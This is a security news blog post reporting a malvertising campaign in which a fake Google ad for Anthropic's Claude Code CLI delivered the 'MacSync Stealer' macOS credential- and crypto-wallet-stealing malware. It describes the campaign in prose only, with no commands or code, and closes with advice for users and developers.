Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Google Ad Used to Spread macOS Credential-Stealing Malware

Google Ad Used to Spread macOS Credential-Stealing Malware

Posted on July 1, 2026 By CWS

A Google-sponsored advertisement posing as Anthropic’s Claude Code CLI has been identified as delivering a macOS credential-stealing malware named “MacSync Stealer.” This malicious software also targets Ledger Live and Ledger Wallet applications to extract cryptocurrency seed phrases.

Uncovering the Malicious Campaign

Researchers at Beelzebub Labs discovered this campaign through their threat intelligence platform, Caronte, following the submission of a suspicious terminal command for analysis. The deceptive ad appeared when users searched for “claude code mac install,” placing it above legitimate search results.

When clicked, users were directed to a counterfeit installation page on sites.google.com, designed to imitate Anthropic’s branding. This page falsely claimed over 12 million downloads and provided a one-click copy button for a harmful terminal command.

Technical Tactics Employed

The attackers used Google Sites strategically due to its content rendering through JavaScript, making it invisible to automated security scanners. Human visitors, however, executed the script, loading the fake page. Trusted domains like sites.google.com often bypass security checks, making this tactic particularly effective.

To deceive less experienced users, the page included a “New to Terminal?” guide, leading them through a fake installation process that normalized entering an admin password. This primed victims to comply with subsequent phishing prompts.

Detailed Breakdown of the Attack

The attack unfolded in six interconnected stages, starting from the ad click to full credential theft and potential wallet hijacking. The process involved stages like a fake install page, a malicious terminal command, and a fake password prompt to capture the Mac login password.

The malware, disguised as a System Preferences prompt, captured passwords, enabling it to access encrypted keychains and browser credentials. For those with Ledger applications, the malware replaced app code, leading to persistent wallet hijacking.

Security Implications and Recommendations

Beelzebub Labs reported the malicious ad to Google, resulting in its removal within 24 hours. However, attackers are known to frequently change URLs to evade detection. Developers are advised to download tools directly from official sources and view any encoded terminal commands with suspicion.

Users who suspect exposure should change their Mac passwords and rotate browser-stored credentials. Recognizing and avoiding these tactics can significantly reduce the risk of credential and data theft.

Cyber Security News Tags:Anthropic, Antivirus, Beelzebub Labs, Caronte, credential theft, crypto wallets, Cybersecurity, Google ad, Ledger Wallet, macOS, macOS security, Malware, Security, threat detection

Post navigation

Previous Post: Citrix Addresses NetScaler Vulnerabilities in Security Update
Next Post: Dawnguard Secures $6.3M for Automated Security Platform

Related Posts

New Windows-Based DarkCloud Stealer Attacking Computers to Steal Login Credentials and Financial Data New Windows-Based DarkCloud Stealer Attacking Computers to Steal Login Credentials and Financial Data Cyber Security News
CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks Cyber Security News
CVE MCP Server Transforms Claude Into Security Analyst CVE MCP Server Transforms Claude Into Security Analyst Cyber Security News
Critical iTerm2 SSH Flaw Found: Text to Code Execution Critical iTerm2 SSH Flaw Found: Text to Code Execution Cyber Security News
Tor Browser 15.0.1 Released With Fix for Multiple Security Vulnerabilities Tor Browser 15.0.1 Released With Fix for Multiple Security Vulnerabilities Cyber Security News
Microsoft Teams Enhances Security by Removing EXIF Data Microsoft Teams Enhances Security by Removing EXIF Data Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Urgent Exploitation of Progress Kemp LoadMaster Vulnerability
  • Apple’s ‘Hide My Email’ Flaw Exposes User Addresses
  • Dawnguard Secures $6.3M for Automated Security Platform
  • Google Ad Used to Spread macOS Credential-Stealing Malware
  • Citrix Addresses NetScaler Vulnerabilities in Security Update

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2026
  • June 2026
  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Urgent Exploitation of Progress Kemp LoadMaster Vulnerability
  • Apple’s ‘Hide My Email’ Flaw Exposes User Addresses
  • Dawnguard Secures $6.3M for Automated Security Platform
  • Google Ad Used to Spread macOS Credential-Stealing Malware
  • Citrix Addresses NetScaler Vulnerabilities in Security Update

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark